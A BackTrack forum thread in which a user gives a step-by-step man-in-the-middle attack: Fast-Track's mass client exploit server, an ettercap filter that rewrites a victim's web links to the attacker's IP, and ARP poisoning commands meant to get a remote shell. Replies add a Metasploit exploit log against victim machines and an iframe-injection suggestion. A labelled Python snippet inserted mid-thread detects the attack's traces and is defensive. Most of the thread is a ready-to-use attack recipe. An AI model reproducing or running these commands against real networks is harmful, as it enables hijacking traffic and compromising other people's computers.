
Thread: fast-track mass client attack + ettercap

  1. #1
    Senior Member BigMac
    Join Date
    Jan 2008
    Posts
    213

    Default fast-track mass client attack + ettercap

    first start up fast-track and run the web gui mode -g
    Code:
    ./fast-track.py -g
    now open a web browser to this page http://127.0.0.1:44444/metaclient

    simply enter your ip address to listen on and click "launch attack"... for example I'll use 192.168.1.5
    you should see 3 consoles pop up... you can minimize them

    now we need to compile our filter that we will use with ettercap
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
    	  # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("a href=", "a href=\"http://192.168.1.5\" ");
       replace("a href=", "a href=\"http://192.168.1.5\" ");
       msg("Filter Ran.\n");
    }
    you must make sure you replace the ip address in the filter to match that of your server... save this as massclient.filter

    then in a new console compile the filter with this command
    Code:
    etterfilter massclient.filter -o massclient.ef

    now start ettercap with this command
    Code:
    ettercap -T -q -F massclient.ef -M ARP /192.168.1.2/ //
    now wait for your target to visit the evil webpage that fast-track has set up and check your sessions -l for a shell

    I don't take credit for this... I just took someone else's tutorial and made a quick change to the filter... for more info check these links
    http://www.irongeek.com/i.php?page=s...ettercapfilter
    http://forums.remote-exploit.org/sho...t=12885&page=9
    I think dr_green also has one but can't find it at this time

    this was a quick walkthrough... I hope someone finds this useful... let me know if I made mistakes... the filter is also kinda buggy but it gets the job done...
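
Added example, not part of the original post or of Fast-Track/ettercap: a defender-side check for the footprints the filter above leaves in captured HTTP traffic, plus the duplicate-MAC sign of ARP poisoning in `arp -an` style output. The function names, the sample MAC addresses and the 192.168.1.1 gateway address are constructed for illustration.

```python
import re
from collections import defaultdict

# Header name the filter in the post writes over "Accept-Encoding".
ZAPPED_HEADER = "accept-rubbish!"
# <a href="X" "Y": the page's real URL is left behind as a stray quoted token.
STRAY_HREF = re.compile(r'<a\s+href="([^"]*)"\s+"[^"]*"', re.I)
# One neighbour entry as printed by `arp -an` on Linux (assumed input format).
ARP_LINE = re.compile(r'\(([\d.]+)\) at ([0-9a-f:]{17})', re.I)

def request_findings(raw_request):
    """Flag a request whose Accept-Encoding header was overwritten in transit."""
    names = {line.split(":", 1)[0].strip().lower()
             for line in raw_request.split("\r\n")[1:] if ":" in line}
    if ZAPPED_HEADER in names:
        return ["accept-encoding-overwritten"]
    if "accept-encoding" not in names:
        return ["accept-encoding-missing"]  # weak signal: some clients omit it
    return []

def rewritten_link_targets(html):
    """Return {injected_target: count} for anchors carrying a stray second URL."""
    counts = defaultdict(int)
    for match in STRAY_HREF.finditer(html):
        counts[match.group(1)] += 1
    return dict(counts)

def shared_macs(arp_output):
    """Return {mac: sorted IPs} for any MAC that claims more than one IP."""
    by_mac = defaultdict(set)
    for ip, mac in ARP_LINE.findall(arp_output):
        by_mac[mac.lower()].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

# Constructed samples: 192.168.1.5 is the address used in the post, the rest is invented.
SAMPLE_REQUEST = ("GET / HTTP/1.1\r\nHost: example.test\r\n"
                  "Accept-Rubbish!: gzip, deflate\r\n\r\n")
SAMPLE_HTML = ('<a href="http://192.168.1.5" "/news">News</a> '
               '<a href="http://192.168.1.5" "/mail">Mail</a> '
               '<a href="/ok">untouched</a>')
SAMPLE_ARP = ("? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0\n"
              "? (192.168.1.5) at 00:11:22:33:44:55 [ether] on eth0\n"
              "? (192.168.1.9) at 66:77:88:99:aa:bb [ether] on eth0\n")

if __name__ == "__main__":
    print(request_findings(SAMPLE_REQUEST))
    print(rewritten_link_targets(SAMPLE_HTML))
    print(shared_macs(SAMPLE_ARP))
```

Because the filter only rewrites cleartext traffic on port 80, none of these footprints appear on connections served over HTTPS.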

  2. #2
    Junior Member
    Join Date
    May 2008
    Posts
    56

    Default

    Pwnage. lol. I got a shell and you didn't haha. Just kidding. Thanks for teaching me how to do this, I really appreciate it.
    A+
    Network +
    Security +
    Linux +

    Work in progress: Saving for OSCP

    Currently reading:Hacking-The Art Of Exploitation.

  3. #3
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    5

    Default

    Is there a version of this that works on metasploit instead of backtrack?

  4. #4
    Senior Member BigMac
    Join Date
    Jan 2008
    Posts
    213

    Default

    Mikee, so I guess you are using Windows?

  5. #5
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    5

    Default

    Quote Originally Posted by BigMac View Post
    Mikee, so I guess you are using Windows?

    yes, is it possible to use this?

  6. #6
    Member
    Join Date
    Nov 2007
    Posts
    65

    Default

    This is the Backtrack forum, not a place for how to do things on Windows. You should use Google to ask the same question; you will have more success.

    Or simply start using backtrack, you can do it, like most of us do.

  7. #7
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    23

    Default

    Ok, got everything working but can't get a shell, what am I doing wrong?
    stalls here:
    [*] Attempting to exploit ani_loadimage_chunksize
    [*] Sending exploit to 192.168.1.105:1626...
    [*] Started bind handler
    [*] Sending ANI file to 192.168.1.105:1625...
    [*] Attempting to exploit ani_loadimage_chunksize
    [*] Sending HTML page to 192.168.1.105:1625...
    [*] Sending exploit to 192.168.1.105:1626...
    [*] Sending exploit HTML to 192.168.1.105:1628...
    [*] Sending HTML to 192.168.1.105:1631...
    [*] Sending HTML to 192.168.1.105:1632...
    [*] Sending HTML to 192.168.1.105:1633...
    [*] Sending exploit to 192.168.1.105:1634...
    [*] Attempting to exploit ani_loadimage_chunksize
    [*] Sending ANI file to 192.168.1.105:1638...
    Victim machine has definitely been pwned..lol..but it is asking to install ActiveX. Also, the victims are WinXP SP2 and a Vista machine, got the same output for both.

  8. #8
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    may just want to put an iframe instead of hijacking ALL the links lol

    just put before </body> the iframe of the evil server ;P

    NOTE: mass client side will crash IE7 so beware.

  9. #9
    Member
    Join Date
    Feb 2006
    Posts
    167

    Default coo coo

    I'll pop this into Fast-Track next update, nice tutorial

  10. #10
    Member
    Join Date
    Feb 2006
    Posts
    167

    Default its done

    Got back from poker night last night after a couple beers and coded the ettercap filters into Fast-Track's Mass Client Attack, works great. Added it to the menu mode, gui, and command line. I'll push the updates on Monday. Nice job BigMac, appreciate the help on getting it to work, made it super simple for me to pop it into my code.

    Screenshots attached:

    http://img223.imageshack.us/img223/9709/ettercapcg2.jpg
